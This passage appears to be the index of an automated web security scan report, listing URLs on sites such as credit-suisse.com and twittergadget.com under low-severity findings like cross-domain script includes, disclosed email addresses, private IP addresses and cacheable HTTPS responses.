12.49. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/suckerfish.js

12.50. https://www.twittergadget.com/gadget.asp

13. Cross-domain script include

13.1. http://www.cio.com/

13.2. http://www.cio.com/article/689607/Tech_Titans_We_Will_Miss_and_Ones_Better_Off_Dismissed

13.3. http://www.cio.com/article/689930/15_Add_Ons_to_Become_a_Gmail_Power_User

13.4. http://www.cnet.com/

13.5. http://www.cnet.com/internet-security/

13.6. http://www.coastaldentalcare.com/

13.7. http://www.computerworld.com/

13.8. http://www.connect.facebook.com/widgets/fan.php

13.9. https://www.createspace.com/3411525

13.10. https://www.createspace.com/Workflow/cart.do

13.11. https://www.createspace.com/en/community/community/member_showcase

13.12. https://www.credit-suisse.com/who_we_are/en/office_locator.jsp

13.13. http://www.csoonline.com/

13.14. http://www.csoonline.com/article/689774/facebook-pwn-tool-steals-profile-info-helps-social-engineers

13.15. https://www.cyscape.com/%22/products/bhtg//%22

13.16. https://www.cyscape.com/images/common/episodes.gif%22

13.17. https://www.cyscape.com/products/bhawk/

13.18. https://www.cyscape.com/products/bhtg/

13.19. https://www.cyscape.com/products/bhtg/howitworks.aspx

13.20. http://www.defenceindepth.net/2009/12/cracking-os-x-passwords.html

13.21. http://www.demo.com/

13.22. http://www.facebook.com/connect/connect.php

13.23. http://www.facebook.com/creditsuisse

13.24. http://www.facebook.com/plugins/likebox.php

13.25. http://www.filecluster.com/

13.26. http://www.filecluster.com/Games/

13.27. http://www.gamepro.com/

13.28. http://www.gamepro.com/lib/includes/ads/scripts/1x1_overlay.js

13.29. http://www.gamepro.com/lib/includes/ads/scripts/202x90.js

13.30. http://www.gamepro.com/lib/includes/ads/scripts/300x600.js

13.31. http://www.gamepro.com/lib/includes/ads/scripts/630x50.js

13.32. http://www.gamepro.com/lib/includes/ads/scripts/728x90.js

13.33. http://www.gamepro.com/lib/includes/ads/scripts/skybox.js

13.34. http://www.gamepro.com/lib/script/typekitcheck.js

13.35. http://www.games.net/

13.36. http://www.genuinewin7.com/

13.37. http://www.goclio.com/

13.38. http://www.goclio.com/legal/privacy/

13.39. http://www.goclio.com/legal/tos/

13.40. http://www.goclio.com/our_customers/

13.41. http://www.goclio.com/signup/

13.42. http://www.goclio.com/tour/

13.43. http://www.google.com/ig/adde

13.44. http://www.horde.org/

13.45. http://www.idc.com/

13.46. http://www.idgconnect.com/

13.47. http://www.ilovefreesoftware.com/

13.48. http://www.ilovefreesoftware.com/category/programming

13.49. http://www.ilovefreesoftware.com/category/theme/default/style.css

13.50. http://www.ilovefreesoftware.com/wp-content/plugins/wp-secure-by-sitesecuritymonitorcom/css/removenotice.css

13.51. http://www.ilovefreesoftware.com/wp-content/w3tc/min/abb96/default.include-footer.28a678.js

13.52. http://www.ilovefreesoftware.com/wp-content/w3tc/min/abb96/default.include.4a6bbc.js

13.53. http://www.infoworld.com/

13.54. http://www.itworld.com/

13.55. http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run

13.56. http://www.law.com/jsp/lawtechnologynews/index.jsp

13.57. http://www.lifehacker.com.au/

13.58. http://www.lifehacker.com.au/2011/09/australian-companies-concentrating-on-mobile-site-development-at-last/

13.59. http://www.lifehacker.com.au/2011/09/how-to-cope-with-the-qantas-strike-disruption/

13.60. https://www.merchantlink.com/logon/log_log_page.jsp

13.61. http://www.mtholyoke.edu/index.html

13.62. http://www.mtholyoke.edu/lits/learn/resources_faculty.html

13.63. https://www.onekingslane.com/contact-us

13.64. https://www.onekingslane.com/corporate/careers/tech/

13.65. https://www.onekingslane.com/join

13.66. https://www.onekingslane.com/join/api%252Fcustomer-summary.xml

13.67. http://www.ortussolutions.com/

13.68. http://www.pcworld.com/article/216731/simple_cheap_apps_for_keeping_secrets_online.html

13.69. http://www.pedigolaw.com/

13.70. http://www.pedigolaw.com/wp-content/themes/infocus/lib/scripts/prettyPhoto/js/jquery.prettyPhoto.js

13.71. http://www.reddit.com/static/button/button1.html

13.72. http://www.reddit.com/static/button/button2.html

13.73. http://www.simplyhired.com/

13.74. http://www.simplyhired.com/a/accounts/login

13.75. http://www.simplyhired.com/a/jobs/list/q-xss

13.76. http://www.simplyhired.com/a/our-company/about-us

13.77. http://www.simplyhired.com/a/our-company/contact-us

13.78. http://www.spro.com/Default.asp

13.79. http://www.styleshout.com/

13.80. http://www.techhail.com/

13.81. http://www.techhail.com/computers/gigabyte-motherboards-india/8481

13.82. http://www.techhail.com/headline/top-best-iphone-games/8468

13.83. http://www.techwev.com/

13.84. http://www.techwev.com/category/apple/

13.85. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/external.js

13.86. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/jquery.cycle.js

13.87. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/slideshow.js

13.88. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/suckerfish-cat.js

13.89. http://www.techwev.com/wp-content/themes/wp-clearv2.0/js/suckerfish.js

13.90. http://www.twittergadget.com/

13.91. http://www.twittergadget.com/contact.php

13.92. http://www.twittergadget.com/donate.html

13.93. http://www.twittergadget.com/donate.php

13.94. http://www.twittergadget.com/gadget.asp

13.95. http://www.twittergadget.com/how_to_install.php

13.96. http://www.twittergadget.com/keyboard_shortcuts.php

13.97. http://www.twittergadget.com/more.php

13.98. http://www.twittergadget.com/new.php

13.99. http://www.twittergadget.com/press.php

13.100. http://www.twittergadget.com/privacy.php

13.101. http://www.twittergadget.com/sign_in_with_twittergadget.htm

13.102. http://www.twittergadget.com/truncit.html

13.103. http://www.twittergadget.com/what_is_oauth.htm

13.104. https://www.twittergadget.com/

13.105. https://www.twittergadget.com/contact.php

13.106. https://www.twittergadget.com/donate.html

13.107. https://www.twittergadget.com/donate.php

13.108. https://www.twittergadget.com/gadget.asp

13.109. https://www.twittergadget.com/how_to_install.php

13.110. https://www.twittergadget.com/keyboard_shortcuts.php

13.111. https://www.twittergadget.com/more.php

13.112. https://www.twittergadget.com/new.php

13.113. https://www.twittergadget.com/notify.php

13.114. https://www.twittergadget.com/press.php

13.115. https://www.twittergadget.com/privacy.php

13.116. https://www.twittergadget.com/reauthorize.htm

13.117. https://www.twittergadget.com/sign_in_with_twittergadget.htm

13.118. https://www.twittergadget.com/sign_in_with_twittergadget.php

13.119. https://www.twittergadget.com/tabs.php

13.120. https://www.twittergadget.com/truncit.html

13.121. https://www.twittergadget.com/what_is_oauth.htm

13.122. http://www.vormetric.com/

13.123. http://www.vormetric.com/resources/useful_links.html

13.124. http://www.vormetric.com/solutions/index.html

13.125. http://www.vormetric.com/solutions/sap_data_security.html

13.126. http://www.zdnet.fr/

14. Email addresses disclosed

14.1. http://www.cio.com/js/jquery/jquery.cookie.js

14.2. http://www.cnet.com/8799-4_1-0.html

14.3. http://www.computerworld.com/resources/scripts/lib/jquery.cookie.js

14.4. https://www.createspace.com/en/community/4.0.15/resources/scripts/gen/41a54d59c9f0130b7bdac8862ec506f8.js

14.5. https://www.createspace.com/en/community/4.0.15/styles/csp/comm.css

14.6. https://www.credit-suisse.com/app/search/js/jquery.busybox.js

14.7. https://www.credit-suisse.com/investment_banking/doc/global_economy_monthly_review.pdf

14.8. https://www.credit-suisse.com/investment_banking/doc/us_economics_digest.pdf

14.9. https://www.credit-suisse.com/investment_banking/fixed_income/en/

14.10. https://www.credit-suisse.com/investment_banking/fixed_income/en/index.jsp

14.11. https://www.credit-suisse.com/news/en/media_release.jsp

14.12. https://www.credit-suisse.com/responsibility/de/initiatives/education_initiative/initiatives_education.jsp

14.13. https://www.credit-suisse.com/responsibility/en/

14.14. https://www.credit-suisse.com/responsibility/en/accessibility.jsp

14.15. https://www.credit-suisse.com/responsibility/en/approach.jsp

14.16. https://www.credit-suisse.com/responsibility/en/banking/client_focus.jsp

14.17. https://www.credit-suisse.com/responsibility/en/banking/client_foundations.jsp

14.18. https://www.credit-suisse.com/responsibility/en/banking/csri/index.jsp

14.19. https://www.credit-suisse.com/responsibility/en/banking/due_diligence.jsp

14.20. https://www.credit-suisse.com/responsibility/en/banking/environment.jsp

14.21. https://www.credit-suisse.com/responsibility/en/banking/equator_principles.jsp

14.22. https://www.credit-suisse.com/responsibility/en/banking/global_compact.jsp

14.23. https://www.credit-suisse.com/responsibility/en/banking/human_rights.jsp

14.24. https://www.credit-suisse.com/responsibility/en/banking/improper_use.jsp

14.25. https://www.credit-suisse.com/responsibility/en/banking/international_agreements.jsp

14.26. https://www.credit-suisse.com/responsibility/en/banking/microfinance.jsp

14.27. https://www.credit-suisse.com/responsibility/en/banking/new_markets.jsp

14.28. https://www.credit-suisse.com/responsibility/en/banking/projects_microfinance.jsp

14.29. https://www.credit-suisse.com/responsibility/en/banking/risk_review.jsp

14.30. https://www.credit-suisse.com/responsibility/en/banking/sector_policies.jsp

14.31. https://www.credit-suisse.com/responsibility/en/banking/sme_switzerland.jsp

14.32. https://www.credit-suisse.com/responsibility/en/banking/sustainability_policy.jsp

14.33. https://www.credit-suisse.com/responsibility/en/banking/trust.jsp

14.34. https://www.credit-suisse.com/responsibility/en/banking/unep.jsp

14.35. https://www.credit-suisse.com/responsibility/en/banking/what_is_microfinance.jsp

14.36. https://www.credit-suisse.com/responsibility/en/banking/wolfsberg.jsp

14.37. https://www.credit-suisse.com/responsibility/en/climate_change.jsp

14.38. https://www.credit-suisse.com/responsibility/en/climate_protection.jsp

14.39. https://www.credit-suisse.com/responsibility/en/ecology.jsp

14.40. https://www.credit-suisse.com/responsibility/en/employer/business_school_assessing_impact.jsp

14.41. https://www.credit-suisse.com/responsibility/en/employer/business_school_experience_sharing.jsp

14.42. https://www.credit-suisse.com/responsibility/en/employer/business_school_learning_technologies.jsp

14.43. https://www.credit-suisse.com/responsibility/en/employer/business_school_new.jsp

14.44. https://www.credit-suisse.com/responsibility/en/employer/business_school_quality.jsp

14.45. https://www.credit-suisse.com/responsibility/en/employer/business_school_succession.jsp

14.46. https://www.credit-suisse.com/responsibility/en/employer/development.jsp

14.47. https://www.credit-suisse.com/responsibility/en/employer/diversity.jsp

14.48. https://www.credit-suisse.com/responsibility/en/employer/gdi_strategy.jsp

14.49. https://www.credit-suisse.com/responsibility/en/employer/graduates.jsp

14.50. https://www.credit-suisse.com/responsibility/en/employer/health_social_care.jsp

14.51. https://www.credit-suisse.com/responsibility/en/employer/index.jsp

14.52. https://www.credit-suisse.com/responsibility/en/employer/networks.jsp

14.53. https://www.credit-suisse.com/responsibility/en/employer/partners_awards.jsp

14.54. https://www.credit-suisse.com/responsibility/en/employer/pkom.jsp

14.55. https://www.credit-suisse.com/responsibility/en/employer/workplace.jsp

14.56. https://www.credit-suisse.com/responsibility/en/environment.jsp

14.57. https://www.credit-suisse.com/responsibility/en/environmental_management.jsp

14.58. https://www.credit-suisse.com/responsibility/en/gri_index.jsp

14.59. https://www.credit-suisse.com/responsibility/en/index.jsp

14.60. https://www.credit-suisse.com/responsibility/en/initiatives/climate/index.jsp

14.61. https://www.credit-suisse.com/responsibility/en/initiatives/education_initiative/initiatives_education.jsp

14.62. https://www.credit-suisse.com/responsibility/en/initiatives/employee_engagement.jsp

14.63. https://www.credit-suisse.com/responsibility/en/initiatives/gcp.jsp

14.64. https://www.credit-suisse.com/responsibility/en/initiatives/index.jsp

14.65. https://www.credit-suisse.com/responsibility/en/initiatives/initiatives_microfinance.jsp

14.66. https://www.credit-suisse.com/responsibility/en/initiatives/microfinance_accion.jsp

14.67. https://www.credit-suisse.com/responsibility/en/measures_in_regions.jsp

14.68. https://www.credit-suisse.com/responsibility/en/objectives.jsp

14.69. https://www.credit-suisse.com/responsibility/en/philanthropy.jsp

14.70. https://www.credit-suisse.com/responsibility/en/philanthropy_apac.jsp

14.71. https://www.credit-suisse.com/responsibility/en/philanthropy_application.jsp

14.72. https://www.credit-suisse.com/responsibility/en/philanthropy_emea.jsp

14.73. https://www.credit-suisse.com/responsibility/en/philanthropy_global.jsp

14.74. https://www.credit-suisse.com/responsibility/en/philantropy_americas.jsp

14.75. https://www.credit-suisse.com/responsibility/en/reporting.jsp

14.76. https://www.credit-suisse.com/responsibility/en/society/dialogue.jsp

14.77. https://www.credit-suisse.com/responsibility/en/society/employer.jsp

14.78. https://www.credit-suisse.com/responsibility/en/society/expertise.jsp

14.79. https://www.credit-suisse.com/responsibility/en/society/homemarket.jsp

14.80. https://www.credit-suisse.com/responsibility/en/society/opinion_leaders.jsp

14.81. https://www.credit-suisse.com/responsibility/en/society/public_debate.jsp

14.82. https://www.credit-suisse.com/responsibility/en/society/salon.jsp

14.83. https://www.credit-suisse.com/responsibility/en/society/sponsoring_switzerland.jsp

14.84. https://www.credit-suisse.com/responsibility/en/society/svc_risikokapital.jsp

14.85. https://www.credit-suisse.com/responsibility/en/society/switzerland.jsp

14.86. https://www.credit-suisse.com/responsibility/en/suppliers_partners.jsp

14.87. https://www.credit-suisse.com/responsibility/en/sustainability_rating.jsp

14.88. https://www.credit-suisse.com/responsibility/it/accessibility.jsp

14.89. https://www.credit-suisse.com/responsibility/it/index.jsp

14.90. https://www.credit-suisse.com/us/asset_management/en/awards/index.jsp

14.91. https://www.credit-suisse.com/us/equities/en/

14.92. https://www.credit-suisse.com/us/equities/en/brazilian_equities.jsp

14.93. https://www.credit-suisse.com/us/equities/en/customized_solutions.jsp

14.94. https://www.credit-suisse.com/us/equities/en/emerging_market_equities.jsp

14.95. https://www.credit-suisse.com/us/equities/en/european_equities.jsp

14.96. https://www.credit-suisse.com/us/equities/en/global_equities.jsp

14.97. https://www.credit-suisse.com/us/equities/en/global_indices.jsp

14.98. https://www.credit-suisse.com/us/equities/en/index.jsp

14.99. https://www.credit-suisse.com/us/equities/en/quantitative_equities.jsp

14.100. https://www.credit-suisse.com/us/equities/en/swiss_equities.jsp

14.101. https://www.credit-suisse.com/us/equities/en/us_equities.jsp

14.102. https://www.credit-suisse.com/us/fixed_income/en/

14.103. https://www.credit-suisse.com/us/fixed_income/en/index.jsp

14.104. https://www.credit-suisse.com/us/hedge_strategies/en/

14.105. https://www.credit-suisse.com/us/hedge_strategies/en/index.jsp

14.106. https://www.credit-suisse.com/us/multi_asset_class_solutions/en/

14.107. https://www.credit-suisse.com/us/multi_asset_class_solutions/en/index.jsp

14.108. https://www.credit-suisse.com/us/private_equity/en/

14.109. https://www.credit-suisse.com/us/private_equity/en/index.jsp

14.110. https://www.credit-suisse.com/us/privatebanking/bank/en/contact.jsp

14.111. https://www.credit-suisse.com/us/real_assets/en/

14.112. https://www.credit-suisse.com/us/real_assets/en/index.jsp

14.113. http://www.csfb.com/client_access/global_soft_dollar.shtml

14.114. http://www.csoonline.com/js/jquery/jquery.cookie.js

14.115. https://www.cyscape.com/%22/products/bhtg//%22

14.116. https://www.cyscape.com/images/common/episodes.gif%22

14.117. https://www.cyscape.com/order/order.asp

14.118. http://www.demo.com/a/s/MobileCompatibility.js

14.119. http://www.demo.com/a/s/jquery.cookies.js

14.120. http://www.demo.com/a/s/jquery.innerfade.js

14.121. http://www.goclio.com/

14.122. http://www.goclio.com/js/facebox/facebox.js

14.123. http://www.goclio.com/js/plugins.js

14.124. http://www.goclio.com/legal/privacy/

14.125. http://www.goclio.com/legal/tos/

14.126. http://www.goclio.com/our_customers/

14.127. http://www.goclio.com/signup/

14.128. http://www.goclio.com/tour/

14.129. http://www.google.com/

14.130. http://www.google.com/search

14.131. http://www.horde.org/

14.132. http://www.infoworld.com/sites/infoworld.com/files/js/js_292164a95ba5cbd3172734997fe7f898.js

14.133. http://www.itworld.com/sites/all/modules/contrib/cluetip/cluetip/jquery.hoverIntent.js

14.134. http://www.itworld.com/sites/all/modules/contrib/hoverintent/js/jquery.hoverIntent.minified.js

14.135. http://www.itworld.com/sites/all/modules/contrib/jquery_ui/jquery.ui/external/cookie/jquery.cookie.js

14.136. http://www.itworld.com/sites/all/modules/features/itw_activity/js/itw_activity.js

14.137. http://www.itworld.com/sites/all/modules/itw/modules/lyris/js/jquery.bgiframe.js

14.138. http://www.law.com/js/advice_email.js

14.139. http://www.lifehacker.com.au/

14.140. http://www.lifehacker.com.au/2011/09/australian-companies-concentrating-on-mobile-site-development-at-last/

14.141. http://www.lifehacker.com.au/2011/09/how-to-cope-with-the-qantas-strike-disruption/

14.142. https://www.onekingslane.com/contact-us

14.143. https://www.onekingslane.com/corporate/careers/tech/

14.144. https://www.onekingslane.com/corporate/careers/tech/js/jquery.dimensions.min.js

14.145. http://www.ortussolutions.com/

14.146. http://www.ortussolutions.com/products

14.147. http://www.ortussolutions.com/products/codexwiki

14.148. http://www.pcworld.com/script/jqModal.js

14.149. http://www.proxyon.com/

14.150. http://www.proxyon.com/communication/links

14.151. http://www.proxyon.com/contact

14.152. http://www.proxyon.com/favicon.ico

14.153. http://www.proxyon.com/solutions/fico_solutions

14.154. http://www.proxyon.com/solutions/reorganizing_system_structures

14.155. http://www.styleshout.com/

14.156. http://www.styleshout.com/images/style.css

14.157. http://www.twittergadget.com/donate.html

14.158. http://www.twittergadget.com/donate.php

14.159. http://www.twittergadget.com/gadget_gmail.xml

14.160. https://www.twittergadget.com/donate.html

14.161. https://www.twittergadget.com/donate.php

14.162. http://www.vormetric.com/

14.163. http://www.zdnet.fr/js/jquery.cookie.js

14.164. http://www.zdnet.fr/js/jquery.hoverIntent.minified.js

14.165. http://www.zdnet.fr/js/jquery.pngFix.pack.js

15. Private IP addresses disclosed

15.1. http://www.connect.facebook.com/widgets/fan.php

15.2. https://www.cyscape.com/%22/products/bhtg//%22

15.3. https://www.cyscape.com/images/common/episodes.gif%22

15.4. https://www.cyscape.com/products/bhawk/

15.5. https://www.cyscape.com/products/bhtg/

15.6. https://www.cyscape.com/products/bhtg/howitworks.aspx

15.7. http://www.facebook.com/connect/connect.php

15.8. http://www.facebook.com/creditsuisse

15.9. http://www.facebook.com/extern/login_status.php

15.10. http://www.facebook.com/extern/login_status.php

15.11. http://www.facebook.com/extern/login_status.php

15.12. http://www.facebook.com/extern/login_status.php

15.13. http://www.facebook.com/extern/login_status.php

15.14. http://www.facebook.com/extern/login_status.php

15.15. http://www.facebook.com/extern/login_status.php

15.16. http://www.facebook.com/extern/login_status.php

15.17. http://www.facebook.com/extern/login_status.php

15.18. http://www.facebook.com/extern/login_status.php

15.19. http://www.facebook.com/extern/login_status.php

15.20. http://www.facebook.com/extern/login_status.php

15.21. http://www.facebook.com/extern/login_status.php

15.22. http://www.facebook.com/extern/login_status.php

15.23. http://www.facebook.com/extern/login_status.php

15.24. http://www.facebook.com/extern/login_status.php

15.25. http://www.facebook.com/extern/login_status.php

15.26. http://www.facebook.com/extern/login_status.php

15.27. http://www.facebook.com/extern/login_status.php

15.28. http://www.facebook.com/extern/login_status.php

15.29. http://www.facebook.com/extern/login_status.php

15.30. http://www.facebook.com/plugins/like.php

15.31. http://www.facebook.com/plugins/like.php

15.32. http://www.facebook.com/plugins/like.php

15.33. http://www.facebook.com/plugins/like.php

15.34. http://www.facebook.com/plugins/like.php

15.35. http://www.facebook.com/plugins/like.php

15.36. http://www.facebook.com/plugins/like.php

15.37. http://www.facebook.com/plugins/like.php

15.38. http://www.facebook.com/plugins/like.php

15.39. http://www.facebook.com/plugins/like.php

15.40. http://www.facebook.com/plugins/like.php

15.41. http://www.facebook.com/plugins/like.php

15.42. http://www.facebook.com/plugins/like.php

15.43. http://www.facebook.com/plugins/like.php

15.44. http://www.facebook.com/plugins/like.php

15.45. http://www.facebook.com/plugins/like.php

15.46. http://www.facebook.com/plugins/like.php

15.47. http://www.facebook.com/plugins/like.php

15.48. http://www.facebook.com/plugins/like.php

15.49. http://www.facebook.com/plugins/like.php

15.50. http://www.facebook.com/plugins/like.php

15.51. http://www.facebook.com/plugins/like.php

15.52. http://www.facebook.com/plugins/like.php

15.53. http://www.facebook.com/plugins/like.php

15.54. http://www.facebook.com/plugins/like.php

15.55. http://www.facebook.com/plugins/like.php

15.56. http://www.facebook.com/plugins/like.php

15.57. http://www.facebook.com/plugins/like.php

15.58. http://www.facebook.com/plugins/like.php

15.59. http://www.facebook.com/plugins/like.php

15.60. http://www.facebook.com/plugins/like.php

15.61. http://www.facebook.com/plugins/like.php

15.62. http://www.facebook.com/plugins/like.php

15.63. http://www.facebook.com/plugins/like.php

15.64. http://www.facebook.com/plugins/like.php

15.65. http://www.facebook.com/plugins/like.php

15.66. http://www.facebook.com/plugins/like.php

15.67. http://www.facebook.com/plugins/like.php

15.68. http://www.facebook.com/plugins/like.php

15.69. http://www.facebook.com/plugins/like.php

15.70. http://www.facebook.com/plugins/like.php

15.71. http://www.facebook.com/plugins/like.php

15.72. http://www.facebook.com/plugins/like.php

15.73. http://www.facebook.com/plugins/like.php

15.74. http://www.facebook.com/plugins/like.php

15.75. http://www.facebook.com/plugins/like.php

15.76. http://www.facebook.com/plugins/like.php

15.77. http://www.facebook.com/plugins/like.php

15.78. http://www.facebook.com/plugins/like.php

15.79. http://www.facebook.com/plugins/like.php

15.80. http://www.facebook.com/plugins/like.php

15.81. http://www.facebook.com/plugins/like.php

15.82. http://www.facebook.com/plugins/like.php

15.83. http://www.facebook.com/plugins/like.php

15.84. http://www.facebook.com/plugins/like.php

15.85. http://www.facebook.com/plugins/like.php

15.86. http://www.facebook.com/plugins/like.php

15.87. http://www.facebook.com/plugins/like.php

15.88. http://www.facebook.com/plugins/like.php

15.89. http://www.facebook.com/plugins/like.php

15.90. http://www.facebook.com/plugins/like.php

15.91. http://www.facebook.com/plugins/like.php

15.92. http://www.facebook.com/plugins/likebox.php

15.93. http://www.facebook.com/plugins/likebox.php

15.94. http://www.facebook.com/plugins/likebox.php

15.95. http://www.facebook.com/plugins/likebox.php

15.96. http://www.facebook.com/plugins/likebox.php

15.97. http://www.facebook.com/plugins/likebox.php

15.98. http://www.facebook.com/plugins/likebox.php

15.99. http://www.facebook.com/plugins/likebox.php

15.100. http://www.facebook.com/plugins/recommendations.php

15.101. http://www.facebook.com/plugins/recommendations.php

15.102. http://www.google.com/sdch/sXoKgwNA.dct

16. Credit card numbers disclosed

16.1. https://www.credit-suisse.com/investment_banking/doc/european_economics.pdf

16.2. https://www.credit-suisse.com/investment_banking/doc/global_economics_daily.pdf

16.3. https://www.credit-suisse.com/investment_banking/doc/global_economy_monthly_review.pdf

16.4. https://www.credit-suisse.com/investment_banking/doc/japan_economics_weekly.pdf

16.5. https://www.credit-suisse.com/investment_banking/doc/market_focus.pdf

16.6. https://www.credit-suisse.com/investment_banking/doc/us_economics_digest.pdf

16.7. http://www.goclio.com/resources/white_papers/Why%20Go%20Cloud%20-%20Five%20Reasons%20Why%20Lawyers%20Should%20Adopt%20Cloud-based%20Technology.pdf

17. Cacheable HTTPS response

17.1. https://www.createspace.com/Special/HeaderAnnouncement.jsp

17.2. https://www.createspace.com/Special/Js/menu_config.js.jsp

17.3. https://www.createspace.com/en/community/community/member_showcase

17.4. https://www.createspace.com/en/community/render-widget!execute.jspa

17.5. https://www.credit-suisse.com/about_us/en/

17.6. https://www.credit-suisse.com/about_us/en/index.jsp

17.7. https://www.credit-suisse.com/about_us/it/index.jsp

17.8. https://www.credit-suisse.com/asset_management/global_includes/alternativeinvestments/en/bio/filippo_rima_cfa.jsp

17.9. https://www.credit-suisse.com/asset_management/global_includes/extensions/klp2_big_image.css

17.10. https://www.credit-suisse.com/careers/berufslehren/en/index.jsp

17.11. https://www.credit-suisse.com/careers/campus_recruiting/en/

17.12. https://www.credit-suisse.com/careers/campus_recruiting/en/index.jsp

17.13. https://www.credit-suisse.com/careers/de/index.jsp

17.14. https://www.credit-suisse.com/careers/en/

17.15. https://www.credit-suisse.com/careers/en/index.jsp

17.16. https://www.credit-suisse.com/careers/experienced_professionals/en/

17.17. https://www.credit-suisse.com/careers/experienced_professionals/en/index.jsp

17.18. https://www.credit-suisse.com/careers/mittelschulabsolventen/en/index.jsp

17.19. https://www.credit-suisse.com/ch/asset_management/en/index.jsp

17.20. https://www.credit-suisse.com/ch/de/

17.21. https://www.credit-suisse.com/ch/en/

17.22. https://www.credit-suisse.com/ch/en/index.jsp

17.23. https://www.credit-suisse.com/ch/fr/index.jsp

17.24. https://www.credit-suisse.com/ch/it/index.jsp

17.25. https://www.credit-suisse.com/ch/unternehmen/en/index.jsp

17.26. https://www.credit-suisse.com/ch/unternehmen/it/index.jsp

17.27. https://www.credit-suisse.com/cookie-check/CookieCheckError.html

17.28. https://www.credit-suisse.com/forms/asset_management/en/contact_am_us.jsp

17.29. https://www.credit-suisse.com/global/en/

17.30. https://www.credit-suisse.com/governance/en/

17.31. https://www.credit-suisse.com/governance/en/index.jsp

17.32. https://www.credit-suisse.com/ib/

17.33. https://www.credit-suisse.com/index/en/

17.34. https://www.credit-suisse.com/investment_banking/

17.35. https://www.credit-suisse.com/investment_banking/about_ib/en/index.jsp

17.36. https://www.credit-suisse.com/investment_banking/advisory_services/en/

17.37. https://www.credit-suisse.com/investment_banking/advisory_services/en/index.jsp

17.38. https://www.credit-suisse.com/investment_banking/award_rankings/en/index.jsp

17.39. https://www.credit-suisse.com/investment_banking/awards_rankings/en/

17.40. https://www.credit-suisse.com/investment_banking/client_notices/en/

17.41. https://www.credit-suisse.com/investment_banking/doc/european_economics.pdf

17.42. https://www.credit-suisse.com/investment_banking/doc/global_economics_daily.pdf

17.43. https://www.credit-suisse.com/investment_banking/doc/global_economy_monthly_review.pdf

17.44. https://www.credit-suisse.com/investment_banking/doc/japan_economics_weekly.pdf

17.45. https://www.credit-suisse.com/investment_banking/doc/market_focus.pdf

17.46. https://www.credit-suisse.com/investment_banking/doc/us_economics_digest.pdf

17.47. https://www.credit-suisse.com/investment_banking/en/

17.48. https://www.credit-suisse.com/investment_banking/en/biography/ib_management.jsp

17.49. https://www.credit-suisse.com/investment_banking/en/index.jsp

17.50. https://www.credit-suisse.com/investment_banking/equities/en/

17.51. https://www.credit-suisse.com/investment_banking/equities/en/index.jsp

17.52. https://www.credit-suisse.com/investment_banking/fixed_income/en/

17.53. https://www.credit-suisse.com/investment_banking/fixed_income/en/index.jsp

17.54. https://www.credit-suisse.com/investment_banking/industry_expertise/en/

17.55. https://www.credit-suisse.com/investment_banking/industry_expertise/en/index.jsp

17.56. https://www.credit-suisse.com/investment_banking/research/en/

17.57. https://www.credit-suisse.com/investment_banking/research/en/cusp.jsp

17.58. https://www.credit-suisse.com/investment_banking/research/en/index.jsp

17.59. https://www.credit-suisse.com/investors/en/

17.60. https://www.credit-suisse.com/investors/en/contacts_investor.jsp

17.61. https://www.credit-suisse.com/investors/en/index.jsp

17.62. https://www.credit-suisse.com/investors/en/reports/2010_cr_report.jsp

17.63. https://www.credit-suisse.com/legal/en/

17.64. https://www.credit-suisse.com/legal/en/pb/pb_usa.jsp

17.65. https://www.credit-suisse.com/markets/emerging_markets/

17.66. https://www.credit-suisse.com/markets/en/

17.67. https://www.credit-suisse.com/news/en/

17.68. https://www.credit-suisse.com/news/en/contacts_press.jsp

17.69. https://www.credit-suisse.com/news/en/index.jsp

17.70. https://www.credit-suisse.com/news/en/media_release.jsp

17.71. https://www.credit-suisse.com/news/it/index.jsp

17.72. https://www.credit-suisse.com/patriotact/en/

17.73. https://www.credit-suisse.com/primetrade/

17.74. https://www.credit-suisse.com/primeview/

17.75. https://www.credit-suisse.com/privacy/en/

17.76. https://www.credit-suisse.com/responsibility/de/initiatives/education_initiative/initiatives_education.jsp

17.77. https://www.credit-suisse.com/responsibility/en/

17.78. https://www.credit-suisse.com/responsibility/en/accessibility.jsp

17.79. https://www.credit-suisse.com/responsibility/en/approach.jsp

17.80. https://www.credit-suisse.com/responsibility/en/banking/client_focus.jsp

17.81. https://www.credit-suisse.com/responsibility/en/banking/client_foundations.jsp

17.82. https://www.credit-suisse.com/responsibility/en/banking/csri/index.jsp

17.83. https://www.credit-suisse.com/responsibility/en/banking/due_diligence.jsp

17.84. https://www.credit-suisse.com/responsibility/en/banking/environment.jsp

17.85. https://www.credit-suisse.com/responsibility/en/banking/equator_principles.jsp

17.86. https://www.credit-suisse.com/responsibility/en/banking/global_compact.jsp

17.87. https://www.credit-suisse.com/responsibility/en/banking/human_rights.jsp

17.88. https://www.credit-suisse.com/responsibility/en/banking/improper_use.jsp

17.89. https://www.credit-suisse.com/responsibility/en/banking/international_agreements.jsp

17.90. https://www.credit-suisse.com/responsibility/en/banking/microfinance.jsp

17.91. https://www.credit-suisse.com/responsibility/en/banking/new_markets.jsp

17.92. https://www.credit-suisse.com/responsibility/en/banking/projects_microfinance.jsp

17.93. https://www.credit-suisse.com/responsibility/en/banking/risk_review.jsp

17.94. https://www.credit-suisse.com/responsibility/en/banking/sector_policies.jsp

17.95. https://www.credit-suisse.com/responsibility/en/banking/sme_switzerland.jsp

17.96. https://www.credit-suisse.com/responsibility/en/banking/sustainability_policy.jsp

17.97. https://www.credit-suisse.com/responsibility/en/banking/trust.jsp

17.98. https://www.credit-suisse.com/responsibility/en/banking/unep.jsp

17.99. https://www.credit-suisse.com/responsibility/en/banking/what_is_microfinance.jsp

17.100. https://www.credit-suisse.com/responsibility/en/banking/wolfsberg.jsp

17.101. https://www.credit-suisse.com/responsibility/en/climate_change.jsp

17.102. https://www.credit-suisse.com/responsibility/en/climate_protection.jsp

17.103. https://www.credit-suisse.com/responsibility/en/ecology.jsp

17.104. https://www.credit-suisse.com/responsibility/en/employer/business_school_assessing_impact.jsp

17.105. https://www.credit-suisse.com/responsibility/en/employer/business_school_experience_sharing.jsp

17.106. https://www.credit-suisse.com/responsibility/en/employer/business_school_learning_technologies.jsp

17.107. https://www.credit-suisse.com/responsibility/en/employer/business_school_new.jsp

17.108. https://www.credit-suisse.com/responsibility/en/employer/business_school_quality.jsp

17.109. https://www.credit-suisse.com/responsibility/en/employer/business_school_succession.jsp

